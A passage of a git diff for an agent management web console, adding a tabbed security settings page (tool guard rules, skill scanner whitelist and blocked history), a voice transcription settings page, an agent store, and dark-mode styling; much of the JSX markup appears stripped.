color: rgba(255, 255, 255, 0.45); +} + +.codeHash { + font-size: 12px; +} + .footerButtons { display: flex; justify-content: flex-end; diff --git a/console/src/pages/Settings/Security/index.tsx b/console/src/pages/Settings/Security/index.tsx index db8ac913f..bf100d1c7 100644 --- a/console/src/pages/Settings/Security/index.tsx +++ b/console/src/pages/Settings/Security/index.tsx @@ -6,12 +6,23 @@ import { Card, Select, message, + Tabs, } from "@agentscope-ai/design"; -import { PlusCircleOutlined } from "@ant-design/icons"; +import { + PlusCircleOutlined, + SafetyOutlined, + ScanOutlined, +} from "@ant-design/icons"; import { useTranslation } from "react-i18next"; import api from "../../../api"; import { useToolGuard, type MergedRule } from "./useToolGuard"; -import { PageHeader, RuleTable, RuleModal, PreviewModal } from "./components"; +import { + PageHeader, + RuleTable, + RuleModal, + PreviewModal, + SkillScannerSection, +} from "./components"; import styles from "./index.module.less"; const BUILTIN_TOOLS = [ @@ -19,6 +30,7 @@ const BUILTIN_TOOLS = [ "execute_python_code", "browser_use", "desktop_screenshot", + "view_image", "read_file", "write_file", "edit_file", @@ -203,94 +215,139 @@ function SecurityPage() {
    - -
    - - setEnabled(val)} /> - + + + {t("security.toolGuardTitle")} + + ), + children: ( +
    +

    + {t("security.toolGuardDescription")} +

    - - - - - + + + + + - - - +
    +

    + {t("security.rules.title")} +

    + +
    -
    - - -
    + + + + +
    + + +
    +
    + ), + }, + { + key: "skillScanner", + label: ( + + + {t("security.skillScanner.title")} + + ), + children: ( +
    +

    + {t("security.skillScanner.description")} +

    + +
    + ), + }, + ]} + />
    (null); + const [blockedHistory, setBlockedHistory] = useState( + [], + ); + const [loading, setLoading] = useState(true); + const [error, setError] = useState(null); + + const fetchAll = useCallback(async () => { + setLoading(true); + setError(null); + try { + const [cfg, history] = await Promise.all([ + api.getSkillScanner(), + api.getBlockedHistory(), + ]); + setConfig(cfg); + setBlockedHistory(history); + } catch (err) { + const msg = + err instanceof Error + ? err.message + : "Failed to load skill scanner config"; + console.error("Failed to load skill scanner:", err); + setError(msg); + } finally { + setLoading(false); + } + }, []); + + useEffect(() => { + fetchAll(); + }, [fetchAll]); + + const updateConfig = useCallback( + async (updates: Partial) => { + if (!config) return; + const newConfig = { ...config, ...updates }; + try { + const saved = await api.updateSkillScanner(newConfig); + setConfig(saved); + return true; + } catch (err) { + console.error("Failed to update skill scanner config:", err); + return false; + } + }, + [config], + ); + + const addToWhitelist = useCallback( + async (skillName: string, contentHash: string = "") => { + try { + await api.addToWhitelist(skillName, contentHash); + await fetchAll(); + return true; + } catch (err) { + console.error("Failed to add to whitelist:", err); + return false; + } + }, + [fetchAll], + ); + + const removeFromWhitelist = useCallback( + async (skillName: string) => { + try { + await api.removeFromWhitelist(skillName); + await fetchAll(); + return true; + } catch (err) { + console.error("Failed to remove from whitelist:", err); + return false; + } + }, + [fetchAll], + ); + + const removeBlockedEntry = useCallback( + async (index: number) => { + try { + await api.removeBlockedEntry(index); + await fetchAll(); + return true; + } catch (err) { + console.error("Failed to remove blocked entry:", err); + return false; + } + }, + [fetchAll], + ); + + const clearBlockedHistory = useCallback(async () => { + try { + await api.clearBlockedHistory(); + setBlockedHistory([]); + return true; + } catch (err) { + console.error("Failed to clear blocked history:", err); + return false; + } + }, []); + + const whitelist: SkillScannerWhitelistEntry[] = config?.whitelist ?? []; + + return { + config, + blockedHistory, + whitelist, + loading, + error, + fetchAll, + updateConfig, + addToWhitelist, + removeFromWhitelist, + removeBlockedEntry, + clearBlockedHistory, + }; +} diff --git a/console/src/pages/Settings/TokenUsage/index.module.less b/console/src/pages/Settings/TokenUsage/index.module.less index a5e486d1f..5772b5ca1 100644 --- a/console/src/pages/Settings/TokenUsage/index.module.less +++ b/console/src/pages/Settings/TokenUsage/index.module.less @@ -5,7 +5,7 @@ /* ---- Section (same as Models / Environments) ---- */ .section { - margin-bottom: 32px; + margin-bottom: 24px; } .section:last-child { @@ -132,3 +132,48 @@ font-family: "SF Mono", "Menlo", monospace; font-size: 13px; } + +/* ─── Dark mode ─────────────────────────────────────────────────────────────── */ +:global(.dark-mode) { + .sectionDesc { + color: rgba(255, 255, 255, 0.35); + } + + .loadingText { + color: rgba(255, 255, 255, 0.35); + } + + .emptyState { + color: rgba(255, 255, 255, 0.25); + } + + /* Summary cards */ + .cardValue { + color: rgba(255, 255, 255, 0.85); + } + + .cardLabel { + color: rgba(255, 255, 255, 0.35); + } + + /* Data table */ + .table { + th, + td { + border-bottom-color: rgba(255, 255, 255, 0.06); + } + + th { + color: rgba(255, 255, 255, 0.4); + background: rgba(255, 255, 255, 0.03); + } + + td { + color: rgba(255, 255, 255, 0.75); + } + + tbody tr:hover { + background: rgba(255, 255, 255, 0.04); + } + } +} diff --git a/console/src/pages/Settings/VoiceTranscription/index.module.less b/console/src/pages/Settings/VoiceTranscription/index.module.less new file mode 100644 index 000000000..b2b0f7b36 --- /dev/null +++ b/console/src/pages/Settings/VoiceTranscription/index.module.less @@ -0,0 +1,95 @@ +.page { + padding: 24px; + height: 100%; + overflow-y: auto; + width: 100%; +} + +.header { + display: flex; + justify-content: space-between; + align-items: center; + margin-bottom: 24px; +} + +.title { + font-size: 24px; + font-weight: 600; + margin: 0 0 8px 0; + color: #000; +} + +.description { + font-size: 14px; + color: #666; + margin: 0; +} + +.card { + width: 100%; + margin-bottom: 16px; + + &:hover { + border: 1px solid #615ced; + box-shadow: 0 12px 32px rgba(0, 0, 0, 0.08); + } +} + +.cardTitle { + font-size: 16px; + font-weight: 600; + margin: 0 0 4px 0; +} + +.cardDescription { + font-size: 13px; + color: #888; + margin: 0 0 16px 0; +} + +.optionLabel { + font-weight: 500; + margin-right: 8px; +} + +.optionDescription { + font-size: 13px; + color: #888; +} + +.centerState { + display: flex; + flex-direction: column; + align-items: center; + justify-content: center; + height: 400px; +} + +.footerActions { + display: flex; + justify-content: flex-end; + align-items: center; + padding: 16px 24px; +} + +:global(.dark-mode) { + .title { + color: rgba(255, 255, 255, 0.88); + } + + .description { + color: rgba(255, 255, 255, 0.45); + } + + .cardDescription { + color: rgba(255, 255, 255, 0.45); + } + + .optionLabel { + color: rgba(255, 255, 255, 0.88); + } + + .optionDescription { + color: rgba(255, 255, 255, 0.45); + } +} diff --git a/console/src/pages/Settings/VoiceTranscription/index.tsx b/console/src/pages/Settings/VoiceTranscription/index.tsx new file mode 100644 index 000000000..3a5b63cb3 --- /dev/null +++ b/console/src/pages/Settings/VoiceTranscription/index.tsx @@ -0,0 +1,287 @@ +import { useEffect, useState } from "react"; +import { Button, Card, message } from "@agentscope-ai/design"; +import { Radio, Select, Space, Spin, Alert } from "antd"; +import { useTranslation } from "react-i18next"; +import api from "../../../api"; +import styles from "./index.module.less"; + +interface TranscriptionProvider { + id: string; + name: string; + available: boolean; +} + +interface LocalWhisperStatus { + available: boolean; + ffmpeg_installed: boolean; + whisper_installed: boolean; +} + +function VoiceTranscriptionPage() { + const { t } = useTranslation(); + const [loading, setLoading] = useState(true); + const [saving, setSaving] = useState(false); + const [audioMode, setAudioMode] = useState("auto"); + const [providerType, setProviderType] = useState("disabled"); + const [providers, setProviders] = useState([]); + const [selectedProviderId, setSelectedProviderId] = useState(""); + const [localWhisperStatus, setLocalWhisperStatus] = + useState(null); + + const fetchSettings = async () => { + setLoading(true); + try { + const [modeRes, provTypeRes, provRes, lwStatus] = await Promise.all([ + api.getAudioMode(), + api.getTranscriptionProviderType(), + api.getTranscriptionProviders(), + api.getLocalWhisperStatus(), + ]); + setAudioMode(modeRes.audio_mode ?? "auto"); + setProviderType(provTypeRes.transcription_provider_type ?? "disabled"); + setProviders(provRes.providers ?? []); + setSelectedProviderId(provRes.configured_provider_id ?? ""); + setLocalWhisperStatus(lwStatus); + } catch (err) { + console.error("Failed to load voice transcription settings:", err); + message.error(t("voiceTranscription.loadFailed")); + } finally { + setLoading(false); + } + }; + + useEffect(() => { + fetchSettings(); + }, []); + + const handleSave = async () => { + setSaving(true); + try { + const promises: Promise[] = [ + api.updateAudioMode(audioMode), + api.updateTranscriptionProviderType(providerType), + ]; + if (providerType === "whisper_api") { + promises.push(api.updateTranscriptionProvider(selectedProviderId)); + } + await Promise.all(promises); + message.success(t("voiceTranscription.saveSuccess")); + } catch (err) { + console.error("Failed to save voice transcription settings:", err); + message.error(t("voiceTranscription.saveFailed")); + } finally { + setSaving(false); + } + }; + + if (loading) { + return ( +
    +
    + +
    +
    + ); + } + + const availableProviders = providers.filter((p) => p.available); + const showProviderSection = audioMode !== "native"; + const isLocalWhisper = providerType === "local_whisper"; + const isWhisperApi = providerType === "whisper_api"; + + return ( +
    +
    +
    +

    {t("voiceTranscription.title")}

    +

    + {t("voiceTranscription.description")} +

    +
    +
    + + +

    + {t("voiceTranscription.audioModeLabel")} +

    +

    + {t("voiceTranscription.audioModeDescription")} +

    + setAudioMode(e.target.value)} + > + + + + {t("voiceTranscription.modeAuto")} + + + {t("voiceTranscription.modeAutoDesc")} + + + + + {t("voiceTranscription.modeNative")} + + + {t("voiceTranscription.modeNativeDesc")} + + + + + + {audioMode === "native" && localWhisperStatus && ( +
    + {localWhisperStatus.ffmpeg_installed ? ( + + ) : ( + + )} +
    + )} +
    + + {showProviderSection && ( + <> + +

    + {t("voiceTranscription.providerTypeLabel")} +

    +

    + {t("voiceTranscription.providerTypeDescription")} +

    + setProviderType(e.target.value)} + > + + + + {t("voiceTranscription.providerTypeDisabled")} + + + {t("voiceTranscription.providerTypeDisabledDesc")} + + + + + {t("voiceTranscription.providerTypeWhisperApi")} + + + {t("voiceTranscription.providerTypeWhisperApiDesc")} + + + + + {t("voiceTranscription.providerTypeLocalWhisper")} + + + {t("voiceTranscription.providerTypeLocalWhisperDesc")} + + + + + + {isLocalWhisper && localWhisperStatus && ( +
    + {localWhisperStatus.available ? ( + + ) : ( + + )} +
    + )} +
    + + {isWhisperApi && ( + +

    + {t("voiceTranscription.providerLabel")} +

    +

    + {t("voiceTranscription.providerDescription")} +

    + + {availableProviders.length === 0 ? ( + + ) : ( + + )} +
    + )} + + )} + + + +
    + + +
    +
    + ); +} + +export default VoiceTranscriptionPage; diff --git a/console/src/stores/agentStore.ts b/console/src/stores/agentStore.ts new file mode 100644 index 000000000..bfb800e61 --- /dev/null +++ b/console/src/stores/agentStore.ts @@ -0,0 +1,46 @@ +import { create } from "zustand"; +import { persist } from "zustand/middleware"; +import type { AgentSummary } from "../api/types/agents"; + +interface AgentStore { + selectedAgent: string; + agents: AgentSummary[]; + setSelectedAgent: (agentId: string) => void; + setAgents: (agents: AgentSummary[]) => void; + addAgent: (agent: AgentSummary) => void; + removeAgent: (agentId: string) => void; + updateAgent: (agentId: string, updates: Partial) => void; +} + +export const useAgentStore = create()( + persist( + (set) => ({ + selectedAgent: "default", + agents: [], + + setSelectedAgent: (agentId) => set({ selectedAgent: agentId }), + + setAgents: (agents) => set({ agents }), + + addAgent: (agent) => + set((state) => ({ + agents: [...state.agents, agent], + })), + + removeAgent: (agentId) => + set((state) => ({ + agents: state.agents.filter((a) => a.id !== agentId), + })), + + updateAgent: (agentId, updates) => + set((state) => ({ + agents: state.agents.map((a) => + a.id === agentId ? { ...a, ...updates } : a, + ), + })), + }), + { + name: "copaw-agent-storage", + }, + ), +); diff --git a/console/src/styles/layout.css b/console/src/styles/layout.css index c08207a03..45f19d4ea 100644 --- a/console/src/styles/layout.css +++ b/console/src/styles/layout.css @@ -6,6 +6,657 @@ body { padding: 0; } +/* ─── Dark mode global token overrides ─────────────────────────────────────── */ +html.dark-mode { + color-scheme: dark; +} + +html.dark-mode body { + background: #141414; + color: rgba(255, 255, 255, 0.85); +} + +/* Ant Design layout background in dark mode */ +html.dark-mode .ant-layout, +html.dark-mode .copaw-layout { + background: #141414 !important; +} + +html.dark-mode .ant-layout-content, +html.dark-mode .copaw-layout-content { + background: #141414 !important; +} + +/* Page content area background */ +html.dark-mode .page-content { + background: #141414; +} + +/* Card components — @agentscope-ai/design uses copaw prefix */ +html.dark-mode .copaw-card, +html.dark-mode .ant-card { + background: #1f1f1f !important; + border-color: rgba(255, 255, 255, 0.1) !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-card-head, +html.dark-mode .ant-card-head { + background: #1f1f1f !important; + border-bottom-color: rgba(255, 255, 255, 0.08) !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-card-head-title, +html.dark-mode .ant-card-head-title { + color: rgba(255, 255, 255, 0.85) !important; +} + +/* @agentscope-ai/design Card custom title (sparkPrefix-title inside card-wrapper) */ +html.dark-mode .copaw-card-wrapper .copaw-title, +html.dark-mode .copaw-spark-title { + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-card-wrapper .copaw-info, +html.dark-mode .copaw-spark-info { + color: rgba(255, 255, 255, 0.35) !important; +} + +html.dark-mode .copaw-card-body, +html.dark-mode .ant-card-body { + background: #1f1f1f !important; +} + +/* Table components */ +html.dark-mode .copaw-table, +html.dark-mode .ant-table { + background: #1f1f1f !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-table-wrapper, +html.dark-mode .ant-table-wrapper { + background: #1f1f1f !important; +} + +html.dark-mode .copaw-table-thead > tr > th, +html.dark-mode .ant-table-thead > tr > th, +html.dark-mode .copaw-table-thead > tr > td, +html.dark-mode .ant-table-thead > tr > td { + background: #262626 !important; + color: rgba(255, 255, 255, 0.65) !important; + border-bottom-color: rgba(255, 255, 255, 0.08) !important; +} + +html.dark-mode .copaw-table-tbody > tr > td, +html.dark-mode .ant-table-tbody > tr > td { + background: #1f1f1f !important; + color: rgba(255, 255, 255, 0.85) !important; + border-bottom-color: rgba(255, 255, 255, 0.06) !important; +} + +html.dark-mode .copaw-table-tbody > tr:hover > td, +html.dark-mode .ant-table-tbody > tr:hover > td { + background: #2a2a2a !important; +} + +html.dark-mode .copaw-table-tbody > tr.copaw-table-row-selected > td, +html.dark-mode .ant-table-tbody > tr.ant-table-row-selected > td { + background: rgba(97, 92, 237, 0.12) !important; +} + +/* Table fixed columns shadow in dark mode */ +html.dark-mode .copaw-table-cell-fix-right, +html.dark-mode .ant-table-cell-fix-right { + background: #1f1f1f !important; +} + +html.dark-mode .copaw-table-cell-fix-right-first::after, +html.dark-mode .ant-table-cell-fix-right-first::after { + box-shadow: inset -10px 0 8px -8px rgba(0, 0, 0, 0.45) !important; +} + +/* Table pagination */ +html.dark-mode .copaw-pagination .copaw-pagination-item, +html.dark-mode .ant-pagination .ant-pagination-item { + background: #1f1f1f !important; + border-color: rgba(255, 255, 255, 0.1) !important; +} + +html.dark-mode .copaw-pagination .copaw-pagination-item a, +html.dark-mode .ant-pagination .ant-pagination-item a { + color: rgba(255, 255, 255, 0.65) !important; +} + +html.dark-mode .copaw-pagination .copaw-pagination-item-active, +html.dark-mode .ant-pagination .ant-pagination-item-active { + background: #615ced !important; + border-color: #615ced !important; +} + +html.dark-mode .copaw-pagination .copaw-pagination-item-active a, +html.dark-mode .ant-pagination .ant-pagination-item-active a { + color: #fff !important; +} + +html.dark-mode .copaw-pagination .copaw-pagination-prev button, +html.dark-mode .copaw-pagination .copaw-pagination-next button, +html.dark-mode .ant-pagination .ant-pagination-prev button, +html.dark-mode .ant-pagination .ant-pagination-next button { + background: #1f1f1f !important; + border-color: rgba(255, 255, 255, 0.1) !important; + color: rgba(255, 255, 255, 0.65) !important; +} + +/* Table sorter icons */ +html.dark-mode .copaw-table-column-sorter, +html.dark-mode .ant-table-column-sorter { + color: rgba(255, 255, 255, 0.3) !important; +} + +html.dark-mode .copaw-table-column-sorter-up.active, +html.dark-mode .copaw-table-column-sorter-down.active, +html.dark-mode .ant-table-column-sorter-up.active, +html.dark-mode .ant-table-column-sorter-down.active { + color: #8b87f0 !important; +} + +/* Checkbox in table */ +html.dark-mode .copaw-checkbox-inner, +html.dark-mode .ant-checkbox-inner { + background: #2a2a2a !important; + border-color: rgba(255, 255, 255, 0.2) !important; +} + +html.dark-mode .copaw-checkbox-checked .copaw-checkbox-inner, +html.dark-mode .ant-checkbox-checked .ant-checkbox-inner { + background: #615ced !important; + border-color: #615ced !important; +} + +/* Page titles (h1) */ +html.dark-mode h1, +html.dark-mode h2, +html.dark-mode h3 { + color: rgba(255, 255, 255, 0.85); +} + +/* Input / Textarea */ +html.dark-mode .copaw-input, +html.dark-mode .ant-input { + background: #2a2a2a !important; + border-color: rgba(255, 255, 255, 0.15) !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +/* Disabled input */ +html.dark-mode .copaw-input[disabled], +html.dark-mode .ant-input[disabled], +html.dark-mode .copaw-input-disabled, +html.dark-mode .ant-input-disabled { + background: rgba(255, 255, 255, 0.04) !important; + border-color: rgba(255, 255, 255, 0.08) !important; + color: rgba(255, 255, 255, 0.4) !important; + cursor: not-allowed; +} + +/* Disabled InputNumber */ +html.dark-mode .copaw-input-number-disabled, +html.dark-mode .ant-input-number-disabled, +html.dark-mode .copaw-input-number-disabled .copaw-input-number-input, +html.dark-mode .ant-input-number-disabled .ant-input-number-input { + background: rgba(255, 255, 255, 0.04) !important; + border-color: rgba(255, 255, 255, 0.08) !important; + color: rgba(255, 255, 255, 0.4) !important; +} + +html.dark-mode .copaw-input::placeholder, +html.dark-mode .ant-input::placeholder { + color: rgba(255, 255, 255, 0.25) !important; +} + +html.dark-mode .copaw-input-affix-wrapper, +html.dark-mode .ant-input-affix-wrapper { + background: #2a2a2a !important; + border-color: rgba(255, 255, 255, 0.15) !important; +} + +/* Select */ +html.dark-mode .copaw-select-selector, +html.dark-mode .ant-select-selector { + background: #2a2a2a !important; + border-color: rgba(255, 255, 255, 0.15) !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-select-selection-placeholder, +html.dark-mode .ant-select-selection-placeholder { + color: rgba(255, 255, 255, 0.25) !important; +} + +html.dark-mode .copaw-select-arrow, +html.dark-mode .ant-select-arrow { + color: rgba(255, 255, 255, 0.3) !important; +} + +/* Select dropdown */ +html.dark-mode .copaw-select-dropdown, +html.dark-mode .ant-select-dropdown { + background: #1f1f1f !important; + border-color: rgba(255, 255, 255, 0.1) !important; +} + +html.dark-mode .copaw-select-item, +html.dark-mode .ant-select-item { + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-select-item-option-active, +html.dark-mode .ant-select-item-option-active { + background: rgba(97, 92, 237, 0.12) !important; +} + +html.dark-mode .copaw-select-item-option-selected, +html.dark-mode .ant-select-item-option-selected { + background: rgba(97, 92, 237, 0.2) !important; + color: #8b87f0 !important; +} + +/* Form labels */ +html.dark-mode .copaw-form-item-label > label, +html.dark-mode .ant-form-item-label > label { + color: rgba(255, 255, 255, 0.65) !important; +} + +html.dark-mode .copaw-form-item-required::before, +html.dark-mode .ant-form-item-required::before { + color: #ff4d4f !important; +} + +/* InputNumber */ +html.dark-mode .copaw-input-number, +html.dark-mode .ant-input-number { + background: #2a2a2a !important; + border-color: rgba(255, 255, 255, 0.15) !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-input-number-input, +html.dark-mode .ant-input-number-input { + background: #2a2a2a !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-input-number-handler-wrap, +html.dark-mode .ant-input-number-handler-wrap { + background: #2a2a2a !important; + border-color: rgba(255, 255, 255, 0.1) !important; +} + +html.dark-mode .copaw-input-number-handler, +html.dark-mode .ant-input-number-handler { + color: rgba(255, 255, 255, 0.45) !important; + border-color: rgba(255, 255, 255, 0.1) !important; +} + +/* TimePicker */ +html.dark-mode .copaw-picker, +html.dark-mode .ant-picker { + background: #2a2a2a !important; + border-color: rgba(255, 255, 255, 0.15) !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-picker-input > input, +html.dark-mode .ant-picker-input > input { + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-picker-suffix, +html.dark-mode .ant-picker-suffix { + color: rgba(255, 255, 255, 0.3) !important; +} + +html.dark-mode .copaw-picker-dropdown, +html.dark-mode .ant-picker-dropdown { + background: #1f1f1f !important; +} + +html.dark-mode .copaw-picker-panel, +html.dark-mode .ant-picker-panel { + background: #1f1f1f !important; + border-color: rgba(255, 255, 255, 0.1) !important; +} + +html.dark-mode .copaw-picker-time-panel-cell-inner, +html.dark-mode .ant-picker-time-panel-cell-inner { + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode + .copaw-picker-time-panel-cell-selected + .copaw-picker-time-panel-cell-inner, +html.dark-mode + .ant-picker-time-panel-cell-selected + .ant-picker-time-panel-cell-inner { + background: rgba(97, 92, 237, 0.2) !important; + color: #8b87f0 !important; +} + +/* DatePicker / RangePicker calendar panel */ +html.dark-mode .copaw-picker-dropdown, +html.dark-mode .ant-picker-dropdown { + background: transparent !important; +} + +html.dark-mode .copaw-picker-panel-container, +html.dark-mode .ant-picker-panel-container { + background: #1f1f1f !important; + border: 1px solid rgba(255, 255, 255, 0.1) !important; + box-shadow: 0 8px 24px rgba(0, 0, 0, 0.5) !important; +} + +/* Header (month/year nav) */ +html.dark-mode .copaw-picker-header, +html.dark-mode .ant-picker-header { + border-bottom-color: rgba(255, 255, 255, 0.08) !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-picker-header-view button, +html.dark-mode .ant-picker-header-view button, +html.dark-mode .copaw-picker-prev-icon, +html.dark-mode .copaw-picker-next-icon, +html.dark-mode .copaw-picker-super-prev-icon, +html.dark-mode .copaw-picker-super-next-icon, +html.dark-mode .ant-picker-prev-icon, +html.dark-mode .ant-picker-next-icon, +html.dark-mode .ant-picker-super-prev-icon, +html.dark-mode .ant-picker-super-next-icon { + color: rgba(255, 255, 255, 0.65) !important; +} + +html.dark-mode .copaw-picker-header button:hover, +html.dark-mode .ant-picker-header button:hover { + color: rgba(255, 255, 255, 0.85) !important; +} + +/* Week day labels (Su Mo Tu ...) */ +html.dark-mode .copaw-picker-content th, +html.dark-mode .ant-picker-content th { + color: rgba(255, 255, 255, 0.35) !important; +} + +/* Normal date cells */ +html.dark-mode .copaw-picker-cell .copaw-picker-cell-inner, +html.dark-mode .ant-picker-cell .ant-picker-cell-inner { + color: rgba(255, 255, 255, 0.65) !important; +} + +html.dark-mode .copaw-picker-cell:hover .copaw-picker-cell-inner, +html.dark-mode .ant-picker-cell:hover .ant-picker-cell-inner { + background: rgba(97, 92, 237, 0.2) !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +/* Outside-month cells */ +html.dark-mode .copaw-picker-cell-disabled .copaw-picker-cell-inner, +html.dark-mode .ant-picker-cell-disabled .ant-picker-cell-inner, +html.dark-mode .copaw-picker-cell-disabled, +html.dark-mode .ant-picker-cell-disabled { + color: rgba(255, 255, 255, 0.2) !important; +} + +/* Today marker */ +html.dark-mode .copaw-picker-cell-today .copaw-picker-cell-inner::before, +html.dark-mode .ant-picker-cell-today .ant-picker-cell-inner::before { + border-color: #615ced !important; +} + +/* Selected start/end cell */ +html.dark-mode .copaw-picker-cell-selected .copaw-picker-cell-inner, +html.dark-mode .ant-picker-cell-selected .ant-picker-cell-inner, +html.dark-mode .copaw-picker-cell-range-start .copaw-picker-cell-inner, +html.dark-mode .ant-picker-cell-range-start .ant-picker-cell-inner, +html.dark-mode .copaw-picker-cell-range-end .copaw-picker-cell-inner, +html.dark-mode .ant-picker-cell-range-end .ant-picker-cell-inner { + background: #615ced !important; + color: #fff !important; +} + +/* Range in-between cells */ +html.dark-mode .copaw-picker-cell-in-range::before, +html.dark-mode .ant-picker-cell-in-range::before { + background: rgba(97, 92, 237, 0.15) !important; +} + +html.dark-mode .copaw-picker-cell-in-range .copaw-picker-cell-inner, +html.dark-mode .ant-picker-cell-in-range .ant-picker-cell-inner { + color: rgba(255, 255, 255, 0.85) !important; +} + +/* Range hover preview */ +html.dark-mode .copaw-picker-cell-in-view.copaw-picker-cell-range-hover::before, +html.dark-mode .ant-picker-cell-in-view.ant-picker-cell-range-hover::before, +html.dark-mode + .copaw-picker-cell-in-view.copaw-picker-cell-range-hover-start::after, +html.dark-mode + .ant-picker-cell-in-view.ant-picker-cell-range-hover-start::after, +html.dark-mode + .copaw-picker-cell-in-view.copaw-picker-cell-range-hover-end::after, +html.dark-mode .ant-picker-cell-in-view.ant-picker-cell-range-hover-end::after { + border-color: #8b87f0 !important; +} + +/* Panel footer (OK button area) */ +html.dark-mode .copaw-picker-footer, +html.dark-mode .ant-picker-footer { + border-top-color: rgba(255, 255, 255, 0.08) !important; + background: #1f1f1f !important; +} + +html.dark-mode .copaw-picker-today-btn, +html.dark-mode .ant-picker-today-btn { + color: #8b87f0 !important; +} + +/* Divider between two panels in RangePicker */ +html.dark-mode .copaw-picker-panel + .copaw-picker-panel, +html.dark-mode .ant-picker-panel + .ant-picker-panel { + border-left-color: rgba(255, 255, 255, 0.08) !important; +} + +/* Modal */ +html.dark-mode .copaw-modal-content, +html.dark-mode .ant-modal-content { + background: #1f1f1f !important; + color: rgba(255, 255, 255, 0.85) !important; + box-shadow: 0 8px 32px rgba(0, 0, 0, 0.5) !important; + border: 1px solid rgba(255, 255, 255, 0.1) !important; +} + +html.dark-mode .copaw-modal-header, +html.dark-mode .ant-modal-header { + background: #1f1f1f !important; + border-bottom-color: rgba(255, 255, 255, 0.08) !important; +} + +html.dark-mode .copaw-modal-title, +html.dark-mode .ant-modal-title { + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-modal-close, +html.dark-mode .ant-modal-close { + color: rgba(255, 255, 255, 0.45) !important; +} + +html.dark-mode .copaw-modal-close:hover, +html.dark-mode .ant-modal-close:hover { + color: rgba(255, 255, 255, 0.85) !important; + background: rgba(255, 255, 255, 0.08) !important; +} + +html.dark-mode .copaw-modal-body, +html.dark-mode .ant-modal-body { + background: #1f1f1f !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-modal-footer, +html.dark-mode .ant-modal-footer { + background: #1f1f1f !important; + border-top-color: rgba(255, 255, 255, 0.08) !important; +} + +/* Form labels inside modal */ +html.dark-mode .copaw-modal-body .copaw-form-item-label > label, +html.dark-mode .copaw-modal-body .ant-form-item-label > label, +html.dark-mode .ant-modal-body .ant-form-item-label > label { + color: rgba(255, 255, 255, 0.65) !important; +} + +/* Extra description text inside modal */ +html.dark-mode .copaw-modal-body .copaw-form-item-extra, +html.dark-mode .ant-modal-body .ant-form-item-extra { + color: rgba(255, 255, 255, 0.35) !important; +} + +/* Drawer */ +html.dark-mode .copaw-drawer-content, +html.dark-mode .ant-drawer-content { + background: #1f1f1f !important; +} + +html.dark-mode .copaw-drawer-header, +html.dark-mode .ant-drawer-header { + background: #1f1f1f !important; + border-bottom-color: rgba(255, 255, 255, 0.08) !important; +} + +html.dark-mode .copaw-drawer-title, +html.dark-mode .ant-drawer-title { + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-drawer-close, +html.dark-mode .ant-drawer-close { + color: rgba(255, 255, 255, 0.45) !important; +} + +html.dark-mode .copaw-drawer-close:hover, +html.dark-mode .ant-drawer-close:hover { + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-drawer-body, +html.dark-mode .ant-drawer-body { + background: #1f1f1f !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-drawer-footer, +html.dark-mode .ant-drawer-footer { + background: #1f1f1f !important; + border-top-color: rgba(255, 255, 255, 0.08) !important; +} + +/* Form labels inside drawer */ +html.dark-mode .copaw-drawer-body .copaw-form-item-label > label, +html.dark-mode .copaw-drawer-body .ant-form-item-label > label, +html.dark-mode .ant-drawer-body .ant-form-item-label > label { + color: rgba(255, 255, 255, 0.65) !important; +} + +/* Tooltip info icon inside drawer */ +html.dark-mode .copaw-drawer-body .anticon-info-circle, +html.dark-mode .ant-drawer-body .anticon-info-circle { + color: rgba(255, 255, 255, 0.3) !important; +} + +/* Slider */ +html.dark-mode .copaw-slider-rail, +html.dark-mode .ant-slider-rail { + background-color: rgba(255, 255, 255, 0.12) !important; +} + +html.dark-mode .copaw-slider-track, +html.dark-mode .ant-slider-track { + background-color: #615ced !important; +} + +html.dark-mode .copaw-slider-handle::after, +html.dark-mode .ant-slider-handle::after { + box-shadow: 0 0 0 2px #615ced !important; + background-color: #1f1f1f !important; +} + +html.dark-mode .copaw-slider-dot, +html.dark-mode .ant-slider-dot { + border-color: rgba(255, 255, 255, 0.15) !important; + background-color: #2a2a2a !important; +} + +/* Tooltip popup (slider value) */ +html.dark-mode .copaw-tooltip-inner, +html.dark-mode .ant-tooltip-inner { + background-color: #2a2a2a !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-tooltip-arrow::before, +html.dark-mode .ant-tooltip-arrow::before { + background: #2a2a2a !important; +} + +/* Disabled chat input overlay in dark mode */ +html.dark-mode + [class*="chatDisabledOverlay"] + :global([class*="chat-anywhere-input"]), +html.dark-mode [class*="chatDisabledOverlay"] :global([class*="chat-input"]), +html.dark-mode [class*="chatDisabledOverlay"] :global(textarea), +html.dark-mode [class*="chatDisabledOverlay"] :global(input[type="text"]) { + background-color: #2a2a2a !important; +} + +/* Sender area dark mode */ +html.dark-mode [class*="copaw-sender-content"], +html.dark-mode [class*="sender-content"] { + background: #2a2a2a !important; +} + +/* Chat message bubble text in dark mode */ +html.dark-mode [class*="message-item"] [class*="content"], +html.dark-mode [class*="chat-anywhere"] [class*="message"] p, +html.dark-mode [class*="chat-anywhere"] [class*="message"] li, +html.dark-mode [class*="chat-anywhere"] [class*="message"] h1, +html.dark-mode [class*="chat-anywhere"] [class*="message"] h2, +html.dark-mode [class*="chat-anywhere"] [class*="message"] h3, +html.dark-mode 